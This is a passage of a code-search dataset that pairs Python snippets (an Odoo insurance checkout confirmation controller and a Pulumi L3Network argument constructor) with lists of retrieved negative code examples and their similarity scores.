"def itervalues(self):\n for key in self:\n yield self[key]",
"def __iter__(self):\n try:\n i = self.db[self._headKey]\n while True:\n yield i\n i = self.db[self._getNextKey(i)]\n except KeyError:\n pass",
"def iterkeys(self):\n return iter(kvp.key for kvp in self.keyvaluepair_set.all())",
"def itervalues(self):\n return DictValuesIterator(self)",
"def iterkeys(self):\n return self._d.iterkeys()",
"def __iter__(self):\n return iter(self._items)\n # to use a generator, it would look like this...\n # for item in self._items: yield item",
"def iteroriginal(self):\n for key in self:\n vals = _dict_getitem(self, key)\n for val in vals[1:]:\n yield vals[0], val",
"def __iter__(self):\n if self.empty():\n return\n for node in self.root:\n yield node.key",
"def __iter__(self):\n return iter(self._cached)",
"def __iter__(self):\n raise NotImplementedError(\"__iter__\")"
] | [
"0.8112754",
"0.7881003",
"0.7754839",
"0.76607627",
"0.764876",
"0.7564836",
"0.7504256",
"0.75019187",
"0.74793774",
"0.7474488",
"0.74243957",
"0.7364466",
"0.7364466",
"0.73356414",
"0.7253679",
"0.72350866",
"0.7233559",
"0.7106118",
"0.7090561",
"0.7053434",
"0.69872856",
"0.6984348",
"0.69795036",
"0.6972673",
"0.69265544",
"0.6869416",
"0.6839497",
"0.6831577",
"0.6831577",
"0.680716",
"0.6785401",
"0.6784434",
"0.67601216",
"0.6744813",
"0.6743477",
"0.67005265",
"0.67005265",
"0.67004776",
"0.6691876",
"0.66811323",
"0.6667628",
"0.66597563",
"0.66523415",
"0.663862",
"0.6625783",
"0.66251564",
"0.6622411",
"0.6622411",
"0.66188383",
"0.6582584",
"0.65758693",
"0.65758693",
"0.65758693",
"0.65758693",
"0.65719956",
"0.6571139",
"0.65688634",
"0.656793",
"0.65648437",
"0.65648437",
"0.65610987",
"0.65422887",
"0.6512388",
"0.6477373",
"0.6475892",
"0.6474237",
"0.6432229",
"0.64262855",
"0.63843524",
"0.63768554",
"0.6374607",
"0.6357363",
"0.6341298",
"0.6341298",
"0.6341179",
"0.6336935",
"0.6336935",
"0.6336935",
"0.6336935",
"0.6336935",
"0.6336935",
"0.6336935",
"0.63262063",
"0.6315084",
"0.63013166",
"0.62942415",
"0.62913424",
"0.62866557",
"0.62833667",
"0.62828916",
"0.6281372",
"0.62757266",
"0.6270366",
"0.62667423",
"0.62600166",
"0.62467104",
"0.62404144",
"0.6238442",
"0.6236912",
"0.6223479"
] | 0.7525102 | 6 |
End of checkout process controller. Confirmation is basically seing. | def payment_confirmation(self, **post):
sale_order_id = view.session.get('sale_last_order_id')
partner_id = view.env.user.partner_id
if sale_order_id:
sale_order_id = view.env['sale.order'].sudo().browse(int(sale_order_id))
lines = sale_order_id.order_line
policy_line = view.env['policies.holder.line']
for line in lines:
code = ''.join(random.choice('0123456789ABCDEF') for i in range(16))
policy_line.sudo().create({'name':lines.product_id.id,
'premium':lines.price_unit,
'policy_code':code,
'line_id':partner_id.id,
'start_date':Datetime.now(), 'end_date':Datetime.to_string(timedelta(days=lines.product_id.policy_period*360)+ datetime.now())})
s = super(InsuranceWebsiteSale, self).payment_confirmation()
view.session['sale_last_order_id'] = False
return s
return | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def end(self):\n self.my_print(\"\\t[DONE]\", msg_types.INFO)\n self.in_progress = False",
"def exit(self): \n self.teo_exchange_intent = self.teo_wallet\n self.withdraw_intent = self.euro_wallet\n\n self.register_teo_exchange(self.teo_exchange_intent)\n self.register_withdraw(self.withdraw_intent)\n\n if self.teo_wallet + self.euro_wallet == 0:\n print('Agent exited: ', self.__class__.__name__)\n self.model.schedule.remove(self)",
"def exit(self) -> None:\n\n self.result = self.handle_success('finished-task')",
"def _end(self):\n\n self.logger.msg1(\"Done\")",
"def onCheckout(self, controller):\n \n if askokcancel(\"Proceed\", \"Pay the order?\"):\n c = controller.customer\n package = {'customer_id':c.id, 'order_price':c.my_order.GetTotalPrice}\n msg = controller.transmit(package)\n \n if msg['order_received']:\n c.CheckOut(c.my_order.GetTotalPrice)\n c.Clear()\n controller.show_frame(PageThree)",
"def order_finish(self):\r\n logger.info(f'Remaining qty:{self.quantity-self.filled_quantity}')\r\n self.is_active = False\r\n self.is_finished = True\r\n self.is_trading = False\r\n schedule.clear(tag=self.id)\r\n logger.info(f'Order {self.id} is finished')",
"def end(self):\n self._log.debug('%s: doing ..', __class__.__name__)\n self._log.debug('%s: done.', __class__.__name__)",
"def confirm_exit(self):\n return True",
"def exit(self):\n self.client.logout(self.creds, self.environment)\n self.transport.close()",
"def endCompetition(self):\n self.robot_exit = True",
"def end(self):\n if self.flowComponent:\n self.flowComponent.end()\n pass",
"def end(self):\n pass",
"def end(self):\n pass",
"def end(self):\n pass",
"def finish():\n pass",
"def end(self):\n ...",
"def finish(self) -> None:\n self.__exit__(None, None, None)",
"def finish(self):\n pass",
"def finish(self):\n pass",
"def do_exit(self, _):\n return True",
"def exit(self):\n logger.debug(\"EXIT\")",
"def exit(self) -> None:\n logger.info(messages.general(\"Thank You for using FooTools.\\n\"))\n exit()",
"def finished(self):\n\t\telog(\"finished\")",
"def end(self):\n self._log.debug('doing ..')\n super().end()\n\n self._log.debug('done')",
"def state_finish_exit(cfg, app, win):",
"def terminated(self):\n gc3libs.log.debug(\" ...done.\")",
"def send_finish_event(self):\n self.status['type'] = '__end__'\n self._send()",
"def end(self):\n self._bc.close()",
"def notify_end(self, status, objective):\n pass # pragma: no cover",
"def finish():",
"def finish():",
"def finish():",
"def finish():",
"def exit(self):\n pass",
"def exit(self):\n self.exit_flag = True",
"def report_end(self):\r\n print(f\"\\n\\n\\n{datetime.now()}\\tDone\\n\")",
"def finish_successful_request(self):\n self.session_manager.finish_successful_request()",
"def done_action(self) -> None:\n self.end = datetime.now()",
"def end():\n logging.info(\"Execution Ended\")",
"def finish(self):",
"def finish(self):",
"def do_quit(self, arg):\n cprint(('Thankyou for Using this todo Application!'), 'yellow')\n exit()",
"def endTransaction(self, transactionID: int) -> None:\n ...",
"def exit_client(self):\r\n\r\n sys.exit()",
"def _exit(self, save_vars):\n raise NotImplementedError()",
"def do_exit(self,*args):\r\n return True",
"def endMessage(self):",
"def exit(self):\n print(\"\"\"\\n\n ________________________________________\n\n Thank you for using\n your HABITSBOX today\n ________________________________________\n \"\"\")\n self.analytics.close()\n sys.exit(0)",
"def end(self) -> None:",
"def end(self, commit: bool) -> None:\n ...",
"def __procFinished(self, exitCode, exitStatus):\n self.__finish()",
"def RequestHandler_finish(self):\n if self.request._oboe_finish_ev and self.request._oboe_ctx and self.request._oboe_ctx.is_valid():\n ev = self.request._oboe_finish_ev\n ctx = self.request._oboe_ctx\n if hasattr(self, 'get_status'): # recent Tornado\n ev.add_info(\"Status\", self.get_status())\n elif hasattr(self, '_status_code'): # older Tornado\n ev.add_info(\"Status\", self._status_code)\n\n ev.add_edge(oboe.Context.get_default())\n ctx.report(ev)\n\n # clear the stored oboe event/metadata from the request object\n self.request._oboe_ctx = None\n self.request._oboe_finish_ev = None",
"def __finish(self):\n self.__current_control_node = None\n self._on_finish()\n self.__state = Process.IDLE\n if self.should_terminate():\n self.__terminated = True",
"def end(update, context) -> int:\n update.callback_query.edit_message_text(\n 'Bye! I hope we can talk again some day.')\n\n logger.info(\"User [%s] exited the conversation, [Exit], from [Main Menu / Results State].\",\n update.callback_query.message.chat.first_name)\n return ConversationHandler.END",
"def on_exit(self):\n pass",
"def _exit() -> None:\n\n print(\n \"Thanks for using TbSET. \"\n \"See you next time!\\n\"\n )",
"def quit(self):\n \n # Say good bye\n endMsg = 'controller:: Signing Off!'\n print endMsg\n self.dbF.writerow([endMsg]) \n \n # Close serial connections\n self.sp.closeSer()\n self.tc.closeSer()\n self.ard.closeSer()\n \n # Close log files\n self.dataLogFile.close()\n self.debugLogFile.close()",
"def _finish(self):\n steppable_registry = CompuCellSetup.persistent_globals.steppable_registry\n steppable_registry.finish()\n self.close_frames()",
"def _terminate(self) -> None:\n if not jh.should_execute_silently() or jh.is_debugging():\n logger.info(f\"Terminating {self.symbol}...\")\n\n self.before_terminate()\n\n self._detect_and_handle_entry_and_exit_modifications()\n\n # fake execution of market orders in backtest simulation\n if not jh.is_live():\n store.orders.execute_pending_market_orders()\n\n if jh.is_live():\n self.terminate()\n return\n\n if self.position.is_open:\n store.app.total_open_trades += 1\n store.app.total_open_pl += self.position.pnl\n logger.info(\n f\"Closed open {self.exchange}-{self.symbol} position at {self.position.current_price} with PNL: {round(self.position.pnl, 4)}({round(self.position.pnl_percentage, 2)}%) because we reached the end of the backtest session.\"\n )\n # first cancel all active orders so the balances would go back to the original state\n if self.exchange_type == 'spot':\n self.broker.cancel_all_orders()\n # fake a closing (market) order so that the calculations would be correct\n self.broker.reduce_position_at(self.position.qty, self.position.current_price, self.price)\n self.terminate()\n return\n\n if len(self.entry_orders):\n self._execute_cancel()\n logger.info('Canceled open-position orders because we reached the end of the backtest session.')\n\n self.terminate()",
"def finish(self):\n self.body.finish()",
"def on_end(self, ctx):\n pass",
"def exit(self) -> None:\n self.on_exit(None)",
"def endExecute( self ):\n self.oDialogControl.endExecute()",
"def end(self):\n\n # if the device is a PBR, try to turn off the pump before ending. In case of problems, keep trying for\n # 3 minutes before giving up.\n if self.device_details['device_type'] == 'PBR':\n pump_id = self.device_details['setup']['pump_id']\n counter = 0\n while counter < 60:\n try:\n result = True, self.device.set_pump_state(pump_id, False)\n except Exception as e:\n result = False, e\n\n response = [(datetime.datetime.utcnow().strftime(\"%Y-%m-%d %H:%M:%S\")),\n self.device_details['node_id'],\n self.device_details['device_type'],\n 8,\n [pump_id, False],\n result,\n 'internal']\n\n self.log.update_log(*response) # log the change in pump state (or the cause of failure)\n\n # end the loop if the pump has been successfully turned off\n if result[0]:\n break\n else:\n counter += 1\n sleep(3)\n\n self.device.disconnect()",
"def end_phase():\n pass",
"def END(self):\n log.debug(\"All packets successfully transmitted!\")",
"def on_exit(self, userdata):\n pass",
"def quit_game(self):\n self.done = True",
"def app_fin_done(self):\n if self.task_queue.empty() and self.task_completed_queue.qsize() > 0:\n self.task_completed_queue.get()\n send_str = MSG_wrapper(wid=self.wid)\n self.client.send_string(send_str, len(send_str), 0, Tags.LOGOUT)",
"def proceed(self):\n pass",
"def finish(self):\r\n\r\n self._is_finished = True",
"def exit(self):\n if self._isSubProcessRunning() and self._exitCommand is not None:\n self.__process.stdin.write(self._exitCommand)\n self.__process.stdin.write(os.linesep)\n self.__process.stdin.flush()\n time.sleep(0.5)\n \n if self._isSubProcessRunning() :\n self.__process.kill()\n time.sleep(0.1)\n print 'Done!'",
"def end(self, won, reason):\n pass\n # replace with your end logic",
"def finish(self):\n if self.state == STATE_FINISH_ERROR:\n self.on_error('Something went wrong. :( Please see log.')\n else:\n self.on_finish()\n self.log_file.close()\n self.state = STATE_TERMINAL",
"def end_workunit(self, workunit):\r\n pass",
"def end_workunit(self, workunit):\r\n pass",
"def control_end_wc(self, errormsg):\n self.report(errormsg) # because return_results still fails somewhen\n self.ctx.errors.append(errormsg)\n self.return_results()",
"def end(self):\n #self.manipulator_restore()\n #self.header_text_restore()\n #self.cursor_modal_restore()\n pass",
"def finish_task(self):\n self.report_total_usage()\n if self.retry:\n self.retry = False\n self.curr_retries = 0\n self.state = \"done\"\n self.ready_for_step += 1\n self.RM.release_allocation(self, self.using.nodes)\n self.using.clear()\n self.curr_exec_time = 0\n # log message\n self.fwk.logEvent(self.sim.name, self.name, \"finish_task\", \"finished running\")",
"def exit(self):\n print(\"\\n***************************** Exit Metafor *****************************\")",
"def on_exit(self):\n if tkMessageBox.askyesno(\"Exit\", \"Do you want to quit the application?\"):\n self.logger(\"Program shutdown properly..\\n\")\n self.master.destroy()\n self.endCommand()",
"def end(c: Composition) -> None:\n c.run(\"testdrive\", \"verify-data.td\")",
"def exit(context):\n return _nfc.exit(context)",
"def action_done(self):\n pass",
"def Finish(self):\n pass",
"def checkoutComplete(request):\n\n\tif request.method == \"GET\":\n\n\t\thtml_content = {\n\t\t\t\"order_id\": request.GET.get('order'),\n\t\t\t\"error_message\": request.GET.get('er'),\n\t\t}\n\t\treturn render(request, \"lost-empire/site_templates/transactions/complete.html\", html_content)",
"async def end(self, roles, dialogs):\n self.ended = True",
"def finish(self) -> None:",
"def finish(self) -> None:",
"def present_exit_massage(self):\n print(\"Thank you for using the calculator....\")",
"def shutdown(self):\r\n self.done = True",
"def sendEnd(self):\n self._sendCommonMessage(self.SONY_MSG_Common_Bye, self.ThreeValueMsg.pack(a=0, b=0, c=0))",
"def exit(self):\n self.current.exit()",
"def end(self) -> None:\n return",
"def tpc_finish(self, transaction):\n raise NotImplementedError",
"def onExit(self, event):\r\n\t\tdlg = wx.MessageDialog(self, \"Are you sure you wish to exit?\",\r\n\t\t\t\t\t\t\t\"Confirm Exit\", wx.CANCEL|wx.OK|wx.ICON_QUESTION)\r\n\t\tresult = dlg.ShowModal()\r\n\t\tdlg.Destroy()\r\n\t\tif result == wx.ID_OK: sys.exit()",
"def end(self):\n self.shutdown = True",
"def exit_handler(self):\n self.logger.debug(\n \"Starting script shutdown in the class \" +\n self.__class__.__name__\n )\n\n # Clean up dead processes before exiting\n self.cleanup_dead_processes()\n \"\"\"\n print(\"FAKELOG: [\" + time.strftime(\"%c\") + \"] [UnisonCTRL] Exiting\\n\")\n \"\"\"\n self.logger.debug(\n \"Script shutdown complete in class \" +\n self.__class__.__name__\n )\n\n self.logger.info(\"Exiting UnisonCTRL\")",
"def finish(self):\n if self.serial:\n self.serial.close()",
"def __exit(self, exit_code=0):\r\n self._workspace_manager.stopAutoLoader()\r\n self._workspace_manager.stopReportManager()\r\n\r\n self._main_window.hide()\r\n print \"Closing Faraday...\"\r\n self._workspace_manager.saveWorkspaces()\r\n envs = [env for env in self._shell_envs.itervalues()]\r\n for env in envs:\r\n env.terminate() \r\n \r\n print \"stopping model controller thread...\"\r\n self._model_controller.stop()\r\n print \"stopping model controller thread...\"\r\n self.qapp.quit()\r\n print \"Waiting for controller threads to end...\"\r\n self._model_controller.join()\r\n \r\n return exit_code",
"def closeEvent(self, event):\n sys.exit(0)"
] | [
"0.6969281",
"0.6882413",
"0.6855795",
"0.6694447",
"0.65295106",
"0.65165967",
"0.644258",
"0.6396555",
"0.6290332",
"0.62667876",
"0.6263875",
"0.625368",
"0.625368",
"0.625368",
"0.62194836",
"0.6208796",
"0.62025553",
"0.6159344",
"0.6159344",
"0.6155485",
"0.6152719",
"0.61516094",
"0.6122213",
"0.6108549",
"0.6055314",
"0.60292494",
"0.60239977",
"0.6001598",
"0.6000663",
"0.59955853",
"0.59955853",
"0.59955853",
"0.59955853",
"0.59933823",
"0.598858",
"0.5983542",
"0.5982422",
"0.59806365",
"0.5967326",
"0.5967089",
"0.5967089",
"0.5957592",
"0.5956963",
"0.59494305",
"0.594366",
"0.59369767",
"0.59326476",
"0.5923427",
"0.59227693",
"0.59226525",
"0.59188384",
"0.5916293",
"0.5914076",
"0.589794",
"0.58854234",
"0.5883535",
"0.5882093",
"0.587902",
"0.5878182",
"0.58724785",
"0.58685267",
"0.5860456",
"0.5858876",
"0.5857884",
"0.5849723",
"0.58463854",
"0.58346903",
"0.58246076",
"0.5819733",
"0.581148",
"0.5798062",
"0.57946754",
"0.5786037",
"0.5784778",
"0.5781315",
"0.5781315",
"0.5779483",
"0.5776912",
"0.57751095",
"0.5774306",
"0.57742274",
"0.5762631",
"0.5760552",
"0.57591206",
"0.5756046",
"0.5742907",
"0.57358664",
"0.57324994",
"0.57324994",
"0.57118493",
"0.57111305",
"0.57099247",
"0.57027066",
"0.57017875",
"0.5701358",
"0.569795",
"0.56966406",
"0.5692897",
"0.5688983",
"0.56872654",
"0.5687046"
] | 0.0 | -1 |
The set of arguments for constructing a L3Network resource. | def __init__(__self__, *,
extended_location: pulumi.Input['ExtendedLocationArgs'],
l3_isolation_domain_id: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
vlan: pulumi.Input[float],
hybrid_aks_ipam_enabled: Optional[pulumi.Input[Union[str, 'HybridAksIpamEnabled']]] = None,
hybrid_aks_plugin_type: Optional[pulumi.Input[Union[str, 'HybridAksPluginType']]] = None,
interface_name: Optional[pulumi.Input[str]] = None,
ip_allocation_type: Optional[pulumi.Input[Union[str, 'IpAllocationType']]] = None,
ipv4_connected_prefix: Optional[pulumi.Input[str]] = None,
ipv6_connected_prefix: Optional[pulumi.Input[str]] = None,
l3_network_name: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
pulumi.set(__self__, "extended_location", extended_location)
pulumi.set(__self__, "l3_isolation_domain_id", l3_isolation_domain_id)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "vlan", vlan)
if hybrid_aks_ipam_enabled is None:
hybrid_aks_ipam_enabled = 'True'
if hybrid_aks_ipam_enabled is not None:
pulumi.set(__self__, "hybrid_aks_ipam_enabled", hybrid_aks_ipam_enabled)
if hybrid_aks_plugin_type is None:
hybrid_aks_plugin_type = 'SRIOV'
if hybrid_aks_plugin_type is not None:
pulumi.set(__self__, "hybrid_aks_plugin_type", hybrid_aks_plugin_type)
if interface_name is not None:
pulumi.set(__self__, "interface_name", interface_name)
if ip_allocation_type is None:
ip_allocation_type = 'DualStack'
if ip_allocation_type is not None:
pulumi.set(__self__, "ip_allocation_type", ip_allocation_type)
if ipv4_connected_prefix is not None:
pulumi.set(__self__, "ipv4_connected_prefix", ipv4_connected_prefix)
if ipv6_connected_prefix is not None:
pulumi.set(__self__, "ipv6_connected_prefix", ipv6_connected_prefix)
if l3_network_name is not None:
pulumi.set(__self__, "l3_network_name", l3_network_name)
if location is not None:
pulumi.set(__self__, "location", location)
if tags is not None:
pulumi.set(__self__, "tags", tags) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def __init__(__self__,\n resource_name: str,\n args: CloudServicesNetworkArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...",
"def __init__(__self__,\n resource_name: str,\n args: ManagedNetworkGroupArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...",
"def Args(parser):\n type_choices = {\n 'STANDARD':\n 'Standard network type used for private cloud connectivity. A '\n 'VMware Engine network of type STANDARD is a global resource.',\n 'LEGACY':\n 'Network type used by private clouds created in projects without a'\n ' network of type STANDARD. This network type is only used for new'\n ' PCs in existing projects that continue to use LEGACY network. A '\n 'VMware Engine network of type LEGACY is a regional resource.'\n }\n flags.AddNetworkToParser(parser, positional=True)\n base.ASYNC_FLAG.AddToParser(parser)\n base.ASYNC_FLAG.SetDefault(parser, True)\n parser.display_info.AddFormat('yaml')\n parser.add_argument(\n '--description',\n help=\"\"\"\\\n Text describing the VMware Engine network.\n \"\"\")\n parser.add_argument(\n '--type',\n required=True,\n choices=type_choices,\n help=\"\"\"Type of the VMware Engine network.\"\"\")",
"def Args(cls, parser):\n cls.NETWORK_ARG = network_flags.NetworkArgumentForOtherResource(\n 'A reference to a network in this project',\n detailed_help=\"\"\"\\\n A reference to a network in this project to\n contain the VPN Gateway.\n \"\"\")\n cls.NETWORK_ARG.AddArgument(parser)\n cls.TARGET_VPN_GATEWAY_ARG = flags.TargetVpnGatewayArgument()\n cls.TARGET_VPN_GATEWAY_ARG.AddArgument(parser, operation_type='create')\n\n parser.add_argument(\n '--description',\n help='An optional, textual description for the target VPN Gateway.')",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n description: Optional[pulumi.Input[str]] = None,\n location: Optional[pulumi.Input[str]] = None,\n management_cluster: Optional[pulumi.Input[pulumi.InputType['PrivateCloudManagementClusterArgs']]] = None,\n name: Optional[pulumi.Input[str]] = None,\n network_config: Optional[pulumi.Input[pulumi.InputType['PrivateCloudNetworkConfigArgs']]] = None,\n project: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...",
"def __init__(__self__, *,\n managed_network_name: pulumi.Input[str],\n resource_group_name: pulumi.Input[str],\n kind: Optional[pulumi.Input[Union[str, 'Kind']]] = None,\n location: Optional[pulumi.Input[str]] = None,\n managed_network_group_name: Optional[pulumi.Input[str]] = None,\n management_groups: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceIdArgs']]]] = None,\n subnets: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceIdArgs']]]] = None,\n subscriptions: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceIdArgs']]]] = None,\n virtual_networks: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceIdArgs']]]] = None):\n pulumi.set(__self__, \"managed_network_name\", managed_network_name)\n pulumi.set(__self__, \"resource_group_name\", resource_group_name)\n if kind is not None:\n pulumi.set(__self__, \"kind\", kind)\n if location is not None:\n pulumi.set(__self__, \"location\", location)\n if managed_network_group_name is not None:\n pulumi.set(__self__, \"managed_network_group_name\", managed_network_group_name)\n if management_groups is not None:\n pulumi.set(__self__, \"management_groups\", management_groups)\n if subnets is not None:\n pulumi.set(__self__, \"subnets\", subnets)\n if subscriptions is not None:\n pulumi.set(__self__, \"subscriptions\", subscriptions)\n if virtual_networks is not None:\n pulumi.set(__self__, \"virtual_networks\", virtual_networks)",
"def __init__(self, name: str, *args, size: int = 1024, network: 'base_network.Network' = None):\n self.name = name\n self._network = network if network is not None else defaults.network\n self._network.add_subnet(self)\n self._max_size = size\n self._ip_range = self._network.get_subnet_range(self._max_size)\n self._hosts = list(self._ip_range.hosts())\n\n self._nodes_dict = {}\n self.started = False\n self.loaded = False\n\n for node in utils.args.list_from_args(args):\n self.add_node(node)",
"def Args(parser):\n flags.AddRegion(parser)\n flags.AddCluster(parser)",
"def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n # Add common arguments\n self.add_argument(\n \"--debug\",\n action=\"store_true\",\n default=False,\n help=\"debug mode: show debug messages\",\n )\n self.add_argument(\n \"-s\",\n \"--server\",\n required=True,\n help='Galène server to connect to, e.g. \"wss://galene.example.com/ws\"',\n )\n self.add_argument(\n \"-g\",\n \"--group\",\n required=True,\n help=\"Join this group\",\n )\n self.add_argument(\n \"-u\",\n \"--username\",\n required=True,\n help=\"Group username\",\n )\n self.add_argument(\n \"-p\",\n \"--password\",\n help=\"Group password\",\n )",
"def _build_network(self):\n pass",
"def __init__(__self__,\n resource_name: str,\n args: ClusterArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...",
"def __init__(__self__,\n resource_name: str,\n args: ClusterArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...",
"def __init__(__self__,\n resource_name: str,\n args: ClusterArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...",
"def __init__(__self__, *,\n remote_address_space_prefixes: pulumi.Input[Sequence[pulumi.Input[str]]],\n remote_virtual_network_id: pulumi.Input[str],\n resource_group_name: pulumi.Input[str],\n workspace_id: pulumi.Input[str],\n allow_forwarded_traffic: Optional[pulumi.Input[bool]] = None,\n allow_gateway_transit: Optional[pulumi.Input[bool]] = None,\n allow_virtual_network_access: Optional[pulumi.Input[bool]] = None,\n name: Optional[pulumi.Input[str]] = None,\n use_remote_gateways: Optional[pulumi.Input[bool]] = None):\n pulumi.set(__self__, \"remote_address_space_prefixes\", remote_address_space_prefixes)\n pulumi.set(__self__, \"remote_virtual_network_id\", remote_virtual_network_id)\n pulumi.set(__self__, \"resource_group_name\", resource_group_name)\n pulumi.set(__self__, \"workspace_id\", workspace_id)\n if allow_forwarded_traffic is not None:\n pulumi.set(__self__, \"allow_forwarded_traffic\", allow_forwarded_traffic)\n if allow_gateway_transit is not None:\n pulumi.set(__self__, \"allow_gateway_transit\", allow_gateway_transit)\n if allow_virtual_network_access is not None:\n pulumi.set(__self__, \"allow_virtual_network_access\", allow_virtual_network_access)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if use_remote_gateways is not None:\n pulumi.set(__self__, \"use_remote_gateways\", use_remote_gateways)",
"def __init__(__self__,\n resource_name: str,\n args: LayerVersionPermissionArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...",
"def init_args(parser, custom_option=True):\n ### Weight initialization.\n agroup = parser.add_argument_group('Network initialization options')\n if custom_option:\n # This option becomes important if posthoc custom init is not that\n # trivial anymore (e.g., if networks use batchnorm). Then, the network\n # init must be customized for each such network.\n agroup.add_argument('--custom_network_init', action='store_true',\n help='Whether network parameters should be ' +\n 'initialized in a custom way. If this flag ' +\n 'is set, then Xavier initialization is ' +\n 'applied to weight tensors (zero ' +\n 'initialization for bias vectors). The ' +\n 'initialization of chunk and task ' +\n 'embeddings is independent of this option.')\n agroup.add_argument('--normal_init', action='store_true',\n help='Use weight initialization from a zero-mean ' +\n 'normal with std defined by the argument ' +\n '\\'std_normal_init\\'. Otherwise, Xavier ' +\n 'initialization is used. Biases are ' +\n 'initialized to zero.')\n agroup.add_argument('--std_normal_init', type=float, default=0.02,\n help='If normal initialization is used, this will ' +\n 'be the standard deviation used. Default: ' +\n '%(default)s.')\n agroup.add_argument('--std_normal_temb', type=float, default=1.,\n help='Std when initializing task embeddings. ' +\n 'Default: %(default)s.')\n agroup.add_argument('--std_normal_emb', type=float, default=1.,\n help='If a chunked hypernetwork is used (including ' +\n 'self-attention hypernet), then this will be ' +\n 'the std of their initialization. Default: ' +\n '%(default)s.')\n return agroup",
"def __init__(self):\n self.label = \"Neural network input files\"\n self.description = \"Use this tool to create the input ASCII files for the GeoXplore neural network. Before using this tool, the evidence must be combined into a unique conditions raster with the Combine tool and the band statistics must be obtained for all the evidence using the Band Collection Statistics tool. If desired fuzzy membership attribute can be added to each of the training sites. See the ArcMap Tools Options discussion in Usage Tips in the Help about adjusting default setting for this tool.\"\n self.canRunInBackground = False\n self.category = \"Neural network\"",
"def Args(parser):\n flags.AddNetworkToParser(parser, positional=True)\n base.ASYNC_FLAG.AddToParser(parser)\n base.ASYNC_FLAG.SetDefault(parser, True)",
"def __init__(self, args):\n self.args = args\n\n self.batch_size = args.meta_batch_size\n self.test_batch_size = args.test_batch_size\n self.volume_size = args.volume_size\n self.n_class = args.n_class\n self.compactness_loss_weight = args.compactness_loss_weight\n self.smoothness_loss_weight = args.smoothness_loss_weight\n self.margin = args.margin\n\n self.forward = self.forward_unet\n self.construct_weights = self.construct_unet_weights\n self.seg_loss = _get_segmentation_cost\n self.get_compactness_cost = _get_compactness_cost",
"def __init__(self, resource, *args):\n self.args = list(args)\n self.flags = OrderedDict()\n self.additional_flags = []\n self._AddCommonFlags(resource)",
"def __init__(self, **kwargs):\n\n # Simply hold on to the parameters for now\n self.name = kwargs.get(\"name\", None)\n\n # Placeholder for the resulting layer\n self.layer = None",
"def __init__(__self__,\n resource_name: str,\n args: VirtualNetworkPeeringArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n cluster_id: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n private_network_uuid: Optional[pulumi.Input[str]] = None,\n region: Optional[pulumi.Input[Union[str, 'Region']]] = None,\n size: Optional[pulumi.Input[Union[str, 'DatabaseSlug']]] = None,\n tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n __props__=None):\n ...",
"def __init__(self, strn, *windows):\n self.strn = strn\n self.windows = windows",
"def __init__(__self__,\n resource_name: str,\n args: NetworkFabricControllerArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n description: Optional[pulumi.Input[str]] = None,\n interception_port: Optional[pulumi.Input[int]] = None,\n labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n location: Optional[pulumi.Input[str]] = None,\n mesh_id: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n project: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n kind: Optional[pulumi.Input[Union[str, 'Kind']]] = None,\n location: Optional[pulumi.Input[str]] = None,\n managed_network_group_name: Optional[pulumi.Input[str]] = None,\n managed_network_name: Optional[pulumi.Input[str]] = None,\n management_groups: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ResourceIdArgs']]]]] = None,\n resource_group_name: Optional[pulumi.Input[str]] = None,\n subnets: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ResourceIdArgs']]]]] = None,\n subscriptions: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ResourceIdArgs']]]]] = None,\n virtual_networks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ResourceIdArgs']]]]] = None,\n __props__=None):\n ...",
"def __init__(self, namespace, listOfArgumentNames):\n self.namespace = namespace\n self.listOfArgumentNames = listOfArgumentNames",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n destination_pool_name: Optional[pulumi.Input[str]] = None,\n ip: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...",
